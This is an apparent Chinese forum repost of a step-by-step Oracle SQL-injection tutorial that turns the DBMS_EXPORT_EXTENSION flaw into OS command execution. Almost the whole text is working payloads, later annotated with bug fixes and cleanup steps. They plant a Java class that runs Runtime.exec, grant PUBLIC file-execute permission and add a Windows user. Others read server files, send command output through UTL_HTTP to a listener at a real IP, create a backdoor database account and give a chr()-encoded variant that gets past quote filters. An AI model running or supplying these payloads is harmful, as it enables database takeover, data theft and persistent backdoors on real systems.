
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时，把 `select SYS.DBMS_EXPORT_EXTENSION.....` 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。用 `'a'||` 是为了让条件恒为 true：不论子查询返回什么（包括 NULL，`'a'||NULL` 仍是 `'a'`），`'1'<>'a...'` 都成立，子查询只是为了被求值而执行。语句有点长，可能要用 POST 提交。

安全说明：本文利用的是 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 的 PL/SQL 注入漏洞——该包对 PUBLIC 可执行且以定义者（SYS）权限运行，因此任何数据库账号（包括 web 应用使用的低权限账号）都能借此以 SYS 身份执行任意 DDL/PL/SQL。该漏洞已由 Oracle 在 2006 年 4 月的 Critical Patch Update 修复，以下步骤只对未打补丁的 8i/9i/10g 实例有效；第 1～3 步还要求实例装有 Oracle JVM（Java 选件）。本文仅用于授权测试：每一步都会在目标库（以及服务器操作系统）留下对象、账号和权限变更，测试完成后务必按文末的删除步骤清理。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 上创建 Java 源 LinxUtil，里面有两个静态方法：runCMD 用 Runtime.exec() 执行系统命令并返回其标准输出（不含 stderr，出错时返回异常文本），readFile 读取指定文件的内容。两者都在数据库服务器上、以 Oracle 服务进程的操作系统权限执行。
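-- Step 1: create the Java source LinxUtil inside the database through the
-- DBMS_EXPORT_EXTENSION PL/SQL injection (the DDL runs as SYS).
-- The URL prefix wraps the SELECT so the page's WHERE clause stays true;
-- the SELECT is evaluated only for the side effect of the DDL inside it.
--   runCMD(args)      : Runtime.exec(args); stdout lines joined by "\n"
--                       (stderr is not captured; on error the exception text is returned)
--   readFile(filename): file contents, same error handling
-- Wrapper mechanics: the closing `"` after DBMS_OUTPUT terminates the identifier
-- the vulnerable package interpolates this argument into, `--` comments out its
-- trailing text, and PRAGMA AUTONOMOUS_TRANSACTION lets the DDL run from inside
-- a SELECT. Quotes double at each nesting level: 1 in the outer SQL literal,
-- 2 for the first EXECUTE IMMEDIATE, 4 for the second (where the Java source sits).
-- The forum's anti-copy watermark characters present in the original post have
-- been stripped; this is the clean, runnable form.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)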
------------------------
如果 URL 有长度限制，可以把 readFile() 方法去掉，即:
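-- Step 1 (short form): the same Java source without readFile(), for
-- injection points with a URL length limit. Only runCMD(args) is defined:
-- Runtime.exec(args), stdout lines joined by "\n", exception text on error.
-- Forum anti-copy watermark characters have been stripped from the payload.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)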
同时把后面步骤 提到的 对readFile()的处理语句去掉。
) q+ Q* ?; v' ]------------------------------
1 F3 \4 w' d- F1 ^# ]* e+ K) o2.赋Java权限 $ _2 d; _6 Y; ^4 E0 B2 b
-- Step 2: grant java.io.FilePermission <<ALL FILES>> with the "execute"
-- action to PUBLIC so that Runtime.exec() inside LinxUtil.runCMD passes the
-- Oracle JVM's Java 2 security check. Issued through the same SYS-level
-- injection wrapper as step 1 (8 quotes = one literal quote at this depth).
-- NOTE(review): "execute" does not imply "read". If LinxReadFile later returns
-- a java.security.AccessControlException string instead of file contents,
-- repeat this grant with the "read" action as well.
-- Granting this to PUBLIC lets every database user run OS commands through
-- any Java class they can create; revoke it (dbms_java.revoke_permission,
-- same argument list) when the test is finished.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数（为两个 Java 静态方法建立 PL/SQL 调用规范）
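-- Step 3: PL/SQL call specifications that expose the two Java static methods
-- as SQL-callable functions. Because the DDL is executed as SYS by the
-- injection wrapper, the later steps reference them as sys.LinxRunCMD and
-- sys.LinxReadFile. The Java name inside the call spec needs one literal
-- quote at this depth, hence the 8 quotes. (Forum anti-copy watermark
-- characters have been stripped from the payload.)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

-- Omit this second statement if the short (runCMD-only) Java source was used.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual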
4.赋public执行函数的权限
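-- Step 4: let the web application's account call the functions.
-- EXECUTE is all that is needed to invoke a function; the original post used
-- GRANT ALL, which is broader than necessary. Granting to PUBLIC means every
-- database user can now run OS commands / read files as the Oracle server
-- process — prefer granting to the one account you actually inject from,
-- and revoke/drop when done. (Forum watermark characters stripped.)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual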
5.测试上面的几步是否成功（对象不存在时子查询返回 NULL，条件为 UNKNOWN，页面表现为 false；存在时条件为 true，页面正常返回）
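-- Step 5: check that the call specs exist. Unquoted identifiers are stored
-- upper-case, hence 'LINXRUNCMD' / 'LINXREADFILE'.
-- Detection relies on NULL semantics: if the object is missing the scalar
-- subquery is NULL, '1'<>NULL is UNKNOWN and the page behaves as for a false
-- condition; if it exists the comparison is true.
-- Bug fix: the original first check was written as '1'<>'11'||(...), which
-- is true even when the subquery is NULL ('11'||NULL = '11'), so it could
-- never report a missing function. Both checks now use the plain form.
-- If ALL_OBJECTS returns more than one row for the name (e.g. a synonym)
-- you will get ORA-01427; add "and rownum=1" in that case.
/xxx.jsp?id=1 and '1'<>(
select OBJECT_ID from all_objects where object_name='LINXRUNCMD'
)
/xxx.jsp?id=1 and '1'<>(
select OBJECT_ID from all_objects where object_name='LINXREADFILE'
)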
6.执行命令（命令以 Oracle 服务进程的操作系统权限运行；下面的 net user 会在服务器上新建本地账号，属于持久性改动，测试后记得 net user linx /delete）:
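-- Step 6: run an OS command / read a file on the database host.
-- Both execute with the OS privileges of the Oracle server process.
-- This form is blind — the function's return value is only compared with '1'
-- and never shown; the UNION / UTL_HTTP variants below retrieve the output.
-- "net user linx /add" creates a local Windows account, a persistent change
-- on the server; remove it after the test. (Forum watermark characters stripped.)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)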
  
注意 sys.LinxReadFile()（以及 sys.LinxRunCMD()）返回的是 VARCHAR2 类型，不能用 "and 1<>" 代替 "and '1'<>"，否则 Oracle 会尝试把返回的文本隐式转换成数字而报 ORA-01722。另外 SQL 语句中的 VARCHAR2 有 4000 字节上限（12c 之前），命令输出或文件内容过长时调用会报错。
如果要查看运行结果可以用 union（UNION 分支的列数和列类型必须与页面原查询一致，不足的列用 NULL 补齐）:
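-- In-band retrieval with UNION: the page has to render the selected column,
-- and this branch must match the original query's column count and types
-- (pad with NULLs; the VARCHAR2 output has to land in a character column).
-- Forum anti-copy watermark characters have been stripped from the payload.
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual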
或者用 UTL_HTTP.request() 把结果带外发送到自己控制的主机（要求数据库服务器能访问该主机，且当前账号有 UTL_HTTP 的执行权限；11g 起还要网络 ACL 允许该连接）:
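-- Out-of-band retrieval via UTL_HTTP: the output is appended to the query
-- string of a request to a listener you control. 211.71.147.3/record.php is
-- the author's listener — replace it with your own. Needs egress from the DB
-- host to that listener and EXECUTE on UTL_HTTP (11g+: also a network ACL).
-- Bug fix: Oracle SQL string literals have no backslash escapes, so the
-- original REPLACE(x,'\n','%0A') looked for the two characters "\" and "n"
-- and left the real line feeds appended by LinxUtil untouched, which breaks
-- the HTTP request line. The line feed is matched with chr(10) instead;
-- spaces are encoded the same way. (On 10g+ utl_url.escape() does the whole
-- job; base64 via utl_encode.base64_encode is another option.)
-- Forum anti-copy watermark characters have been stripped from the payload.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)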
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格和换行符 URL 编码掉，否则无法提交 HTTP 请求。换行符在 Oracle 里要写成 chr(10)——SQL 字符串字面量不处理 `\n` 这样的转义，写 '\n' 匹配不到真正的换行。也可以先用 utl_encode.base64_encode 编码（它的输入是 RAW，需先 utl_raw.cast_to_raw）。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 中因上述步骤而新增的对象（这些也是防守方发现此类攻击的痕迹，另可检查 DBA_JAVA_POLICY 中授予 PUBLIC 的 FilePermission）:
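-- List what the previous steps left behind. Unquoted names are stored
-- upper-case (LINXRUNCMD, LINXREADFILE, LINX_QUERY); the Java source was
-- created with a quoted name and is stored as "LinxUtil", hence the second
-- LIKE. Explicit columns instead of SELECT * so the result is readable.
-- Defenders can run the same query (plus DBA_JAVA_POLICY for the PUBLIC
-- FilePermission grant) to spot this technique.
select owner, object_name, object_type, object_id, status, created
from all_objects
where object_name like '%LINX%' or object_name like '%Linx%'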
7.删除我们创建的函数（完整清理还应删除 LinxReadFile 和 Java 源 "LinxUtil"，并撤销第 2 步授予 PUBLIC 的 FilePermission）
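-- Step 7: cleanup. The original post dropped only LinxRunCMD; a complete
-- cleanup also removes LinxReadFile, the Java source "LinxUtil" and the
-- PUBLIC FilePermission from step 2 (otherwise any DB user can still run OS
-- commands through a new Java class). All statements use the same SYS-level
-- wrapper. (Forum watermark characters stripped.)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual

-- If a class object named LinxUtil still shows in ALL_OBJECTS afterwards,
-- repeat with: drop java class "LinxUtil"
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"'''';END;'';END;--','SYS',0,'1',0) from dual

-- Revoke the step-2 grant (revoke_permission takes the same arguments as grant_permission).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual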
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法（不依赖 Oracle JVM）:
创建 oracle 帐号（口令固定为 linxsql，这是留在目标库中的后门账号，测试后务必删除）:
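-- Alternative vulnerability check that does not need the Oracle JVM:
-- create a database account through the injection. The password is fixed
-- and trivial (linxsql/linxsql) and the account persists until dropped —
-- remove it after the test (see the drop user step below).
-- Forum anti-copy watermark characters have been stripped from the payload.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual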
即（用 chr() 拼接、不含单引号的等价写法，注入点过滤单引号时可用；注意这个变体里 PUT 的参数是 :P1 绑定占位符而不是字面量 1）:
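-- chr()-encoded form of the CREATE USER payload, with no single quotes in
-- the request (useful when the injection point filters quotes). Decoded, the
-- arguments are:
--   'FOO', 'BAR',
--   'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--',
--   'SYS', 0, '1', 0
-- Forum anti-copy watermark characters have been stripped from the payload.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual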
确定漏洞存在（账号已创建时子查询返回 user_id，条件为 true；否则返回 NULL，条件为 UNKNOWN）:
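-- Confirm the injection worked: ALL_USERS lists the new account (unquoted
-- names are stored upper-case, hence 'LINXSQL'). If it does not exist the
-- scalar subquery is NULL, 1<>NULL is UNKNOWN and the page behaves as for a
-- false condition. Comparing with the numeric literal 1 is fine here because
-- user_id is a NUMBER. (Forum watermark characters stripped.)
1<>(
select user_id from all_users where username='LINXSQL'
)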
给linxsql连接权限:
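-- Give the test account the CONNECT role (CREATE SESSION) so it can log in
-- directly through the listener. This turns it into a persistent backdoor
-- account with a known password; drop it when the test is over.
-- Forum anti-copy watermark characters have been stripped from the payload.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual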
删除帐号（若该账号期间已创建过对象，DROP USER 会报 ORA-01922，需改为 drop user LINXSQL cascade）:
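-- Remove the test account. This wrapper variant passes the :P1 bind
-- placeholder to DBMS_OUTPUT.PUT instead of the literal 1.
-- If the account owns any objects, DROP USER fails with ORA-01922 —
-- use "drop user LINXSQL cascade" in that case.
-- Forum anti-copy watermark characters have been stripped from the payload.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual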
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功的话返回数值 1。但它声明为 authid current_user，以调用者（即 web 应用账号）的权限执行，可能仅仅是 public 权限，作用似乎不大；真的要用的话可以考虑先用上面的注入 grant dba to 当前的 User——注意这会在目标库留下明显且持久的权限变更，而且这个函数本身就是一个任何有执行权限的账号都能调用的任意 SQL 执行后门，测试后同样要删除:
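-- Create Linx_query(p): executes any statement passed in and returns 1 on
-- success. AUTHID CURRENT_USER makes it run with the caller's privileges
-- (the web application's account), not SYS's, so it cannot do more than that
-- account can. As in step 4, the calling account presumably also needs
-- EXECUTE on it before it can be invoked (the original post does not grant it).
-- Bug fix: a function called from a SELECT may not issue DDL/DML or commit
-- (ORA-14551 / ORA-14552) unless it runs as an autonomous transaction — the
-- injection wrapper itself relies on PRAGMA AUTONOMOUS_TRANSACTION for exactly
-- this reason, but the original Linx_query lacked it. The pragma is added.
-- Forum anti-copy watermark characters have been stripped from the payload.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is pragma autonomous_transaction; begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
-- (The original post continues with a second payload that is truncated in
--  the source after "...DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE" and cannot be
--  reconstructed; it is not reproduced here.)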



